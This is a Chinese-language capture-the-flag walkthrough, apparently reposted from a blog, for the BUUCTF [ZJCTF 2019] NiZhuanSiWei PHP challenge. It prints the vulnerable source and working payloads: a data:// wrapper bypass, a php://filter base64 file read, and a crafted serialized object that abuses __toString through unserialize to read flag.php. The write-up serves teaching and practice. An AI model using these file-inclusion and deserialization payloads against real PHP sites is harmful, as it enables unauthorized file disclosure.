menu
  • 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

BUUCTF [ZJCTF 2019]NiZhuanSiWei1

武飞扬头像
paitoyou
帮助1

涉及知识点:

  1. php代码审计;
  2. date://text/plain协议;
  3. filter 协议;
  4. 反序列化;
  5. 魔术方法

 打开题目链接,是直接给出的php代码。

  1.  
    <?php
  2.  
    $text = $_GET["text"];
  3.  
    $file = $_GET["file"];
  4.  
    $password = $_GET["password"];
  5.  
    if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
  6.  
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
  7.  
    if(preg_match("/flag/",$file)){
  8.  
    echo "Not now!";
  9.  
    exit();
  10.  
    }else{
  11.  
    include($file); //useless.php
  12.  
    $password = unserialize($password);
  13.  
    echo $password;
  14.  
    }
  15.  
    }
  16.  
    else{
  17.  
    highlight_file(__FILE__);
  18.  
    }
  19.  
    ?>
学新通

第一个if语句要求test不为空并且text内容为welcome to the zjctf.

函数file_get_contents()解释:

file_get_contents() 函数把整个文件读入一个字符串中。

file() 一样,不同的是 file_get_contents() 把文件读入一个字符串。

file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法.

(ps:具体用法见:PHP file_get_contents() 函数)

于是便想到date://text/plain伪协议,构造payload绕过第一个if:

使用格式:data://text/plain,[code]
eg: data://text/plain,base64,[code]

http://522341e8-4fc1-4d56-822d-01a0962a4569.node4.buuoj.cn:81/?text=data://text/plain,welcome to the zjctf

重新发送后:显示如图所示:

学新通

 到此,第一个if绕过成功;

学新通

在第二个if语句中发现有提示useless .php文件,便想到使用伪协议filter读取文件内容,

php://filter
    用法:格式为php://filter/[write] or [read]=[过滤器]/[resource]=[文件路径]

构造第二个payload,读取php文件中的内容:

file=php://filter/read=convert.base64-encode/resource=useless.php

重新发送以后,显示如图所示:

学新通

将所得到的内容进行base64解码得到如下php代码:

  1.  
    <?php
  2.  
     
  3.  
    class Flag{ //flag.php
  4.  
    public $file;
  5.  
    public function __tostring(){
  6.  
    if(isset($this->file)){
  7.  
    echo file_get_contents($this->file);
  8.  
    echo "<br>";
  9.  
    return ("U R SO CLOSE !///COME ON PLZ");
  10.  
    }
  11.  
    }
  12.  
    }
  13.  
    ?>

 分析代码

可知flag应该存在于flag.php文件中;

__toString()是快速获取对象的字符串信息的便捷方式,似乎魔术方法都有一个“自动“的特性,如自动获取,自动打印等,__toString()也不例外,它是在直接输出对象引用时自动调用的方法。

__toString()的作用

当我们调试程序时,需要知道是否得出正确的数据。比如打印一个对象时,看看这个对象都有哪些属性,其值是什么,如果类定义了toString方法,就能在测试时,echo打印对象体,对象就会自动调用它所属类定义的toString方法,格式化输出这个对象所包含的数据。

(ps __toString() 函数详解见:php反序列化及__toString() - 镱鍚 - 博客园)

第二个if语句中有一个反序列化:unserialize()函数:unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。可写出序列化代码:

(ps:具体用法见:PHP unserialize() 函数 | 菜鸟教程)

  1.  
    <?php
  2.  
    class Flag{
  3.  
    public $file = flag.php;
  4.  
    }
  5.  
    $a = new Flag();
  6.  
    echo serialize($a);
  7.  
    ?>

运行后可得到;

学新通

则可再一次进行构造完整payload:

?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

 即可显示:学新通

 最后在查看网页源代码,即可发现flag。

学新通

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhgffbab
系列文章
更多 icon
同类精品
更多 icon
继续加载
友情链接: 申请要求:权重≥3,IP≥1000,内容属同类网站; 申请邮件: luke.wu●vfv.cc 友情链接交换群: 友情链接交换群
外链价格: 【首页 30/月 - 300/年】【内页 50/月 - 500/年】【全站 70/月 - 700/年】 购买外链请加QQ群: 站长交流群